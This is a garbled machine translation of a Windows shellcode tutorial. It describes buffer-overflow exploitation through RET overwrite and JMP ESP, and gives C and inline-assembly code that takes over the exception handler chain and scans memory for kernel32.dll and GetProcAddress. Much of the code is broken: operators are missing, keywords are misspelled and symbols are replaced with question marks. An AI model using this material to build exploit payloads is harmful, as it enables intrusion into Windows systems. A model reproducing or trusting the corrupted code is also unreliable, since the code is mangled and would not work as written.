Senior skills written in Windows Shellcode
?
Author: yuange (mailto: yuange@nsfocus.com)
Home: http://www.nsfocus.com/
?
???? Unix and other systems, because there is user concept, it is often overflow to get the ordinary account first, and then use overflow after landing
Load a shell method to get root permissions, its system call is convenient, so shellcode is generally better than
Simple. But the Windows system often does not provide login services, so shellcode, which is overflowed, often provides Socket
Connect, to load the program to get the shell, and the Windows system calls the int2e interface is not as good as the Unix system call INT80
Specification, so the API is usually used, and the API function address is not the same because the system version is different, so we must write
Windows is more practical below, and gelcode, gelcode is more troublesome.
?
After a period of thinking, I got a better way to write shellcode under Windows.
???? 1, the overflow point is determined. This way to cover a RET instruction address using the overflow point, so you just know overflow
???? The point is approximately scope.
???? 2, shellcode positioning. Use the ESP register to locate, as long as the RET address covered in front is a JMP
???? The command address of the ESP function can be positioned.
???? 3, RET command address, JMP ESP function command address adopts address, 54? C3, or FF E4
????, C3 this language of Windows address is fixed, and it is also very good to find this address.
?
???? 4, shellcode is written directly in C language to make it easy to write, modify, and debug.
?
???? 5, shellcode unified encoding, meet the application conditions to the SHELLCODE character, with a small assembly code
???? code, you can write shellcode, you can do not consider special characters.
???? 6, communication encryption, dealing with the firewall, implement the FTP function, and implement the advanced application of the memory directly take over the Web service.
?
???? The following main introduction provides a way to write universal shellcode. The API used in the main shellcode used
GetProcAddress positioning, use libraries to load with LoadLibrarya. That's so shellcode just relying on these two
API. How do you solve the address of these two APIs? Loadlibrarya this API in system library kernel32.dll
Face, you can also get getProcAddress. That is to find the system library kernel32.dll and
GetProcaddress's address. Because the general application will load kernel32.dll, the solution is
Inside the memory found this system library and API address, fortunately, I know that the module data structure of Windows is not difficult, mainly
It is an increase in abnormal structure processing. Below is a VC6.0 program code:
?
Void shellcodefn ()
{
??? int ???????? * Except [3];
??? FarProc ???? procgetadd = 0;
??????????????? * stradd;
??? int ???????? IMGBASE, FNBase, I, K, L;
?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
??? _ asm {
????? jmp ????????? nextcall
????? getstradd: ?? POP ??? stradd
?????????????????????? EDI, EXCEPT
???????????? MOV ??? Eax, DWORD PTR fs: [0]
???????????? MOV ??? DWORD PTR [EDI 0x08], EAX ???????????? MOV ??? DWORD PTR FS: [0], EDI
????}
???? EXCEPT [0] = 0xffffff;
???? EXCEPT [1] = stradd-0x07;
/ * Save an abnormal structural chain and modify the abnormal structure chain, Shellcode takes over an abnormal * /
?
???? imgbase = 0x77e00000;
/ * Search the start of kernel32.dll's starting address * /
?
????????? Call getExceptretAdd
???}
/ * Get an abnormal return address * /
??? for (; imgbase <0xBFFA0000, ProcgetAdd == 0;) {
??????? imgbase = 0x10000;
/ *? The module address is 64K unit, speed up the speed * /
??????? IF (imgbase == 0x78000000) IMGBase = 0xBff00000;
/ *? If it is not searched here, it may be Win9x system * /
??????? if (* (word *) IMGBASE == 'ZM' && * (Word *)
??????? (IMGBASE * (INT *) (IMGBase 0x3c)) == 'EP') {
/ * Modular head * /
????????? fnbase = * (int *) (IMGBASE * (INT *) (IMGBase 0x3c) 0x78) IMGBASE;
????????? k = * (int *) (fnbase 0xc) IMGBase;
????????? IF (* (int *) k == 'NREK' && * (int *) (k 4) == '23LE') {
/ * Module name * /
????????????? LiBHandle = IMGBASE
/ * Get the module header address, the module handle * /
?????????????? k = imgbase * (int *) (fnbase 0x20);
????????????? for (L = 0; L <* (INT *) (FNBase 0x18); L, K = 4) {
????????????????????? f (* (INT *) (IMGBase * (int *) k) == 'Pteg' && * (int *) (4 IMGBase * (int *) k) == 'acor') {
/ * Take the name * /
???????????????????? k = * (Word *) (L L IMGBASE * (INT *) (FNBase 0x24));
??????????????????? k = * (int *) (FNBase 0x10) -1;
???????????????????? k = * (int *) (K K K K IMGBASE * (INBASE 0X1C));
??????????????????? procgetadd = k IMGBASE
/ * API address * /
??????????????????? breaf;
?????????????}
??????????}
????????}
????}
}
// Search Kernel32. The DLL module address and API function getProcaddress address // Note that the search page is not in situation here.
?
??? _ asm {
??????? lea edi, except
?????????? MOV EAX, DWORD PTR [EDI 0x08]
??????? MOV DWORD PTR FS: [0], EAX
???}
/ * Restore anomalous structure chain * /
?
?
IF (ProcgetAdd == 0) goto? Die;
/ * If you didn't find the getProcAddress address dead loop * /
?? DIE: GOTO DIE?;
?
?? _ asm {
?
getExceptretadd: ?? Pop? EAX
????????????? push eax
????????????? MOV? EDI, DWORD PTR [STRADD]
????????????? MOV DWORD PTR [EDI-0X0E], EAX
????????????? RET
/ * Get an abnormal return address, and fill in the exception processing module * /
?
/ * Abnormal processing module * /
Errprogram: ???????? Mov Eax, DWORD PTR [ESP 0x0C]
????????????? add eax, 0xb8
????????????? MOV DWORD PTR [EAX], 0x11223344 // stradd-0xe
/ * Modify exception Return EIP pointer * /
????????????? xor EAX, EAX ?????????????? 2
/ * Do not prompt exception * /
????????????? RET ????????????????? // 1
/ * Abnormal processing returns * /
EXECPTPROGRAM: ???? jmp errprogram ?????????????? // 2 BYTES STRADD-7
NextCall: ????????? Call getStradd ?????????????? // 5 bytes
???}
}
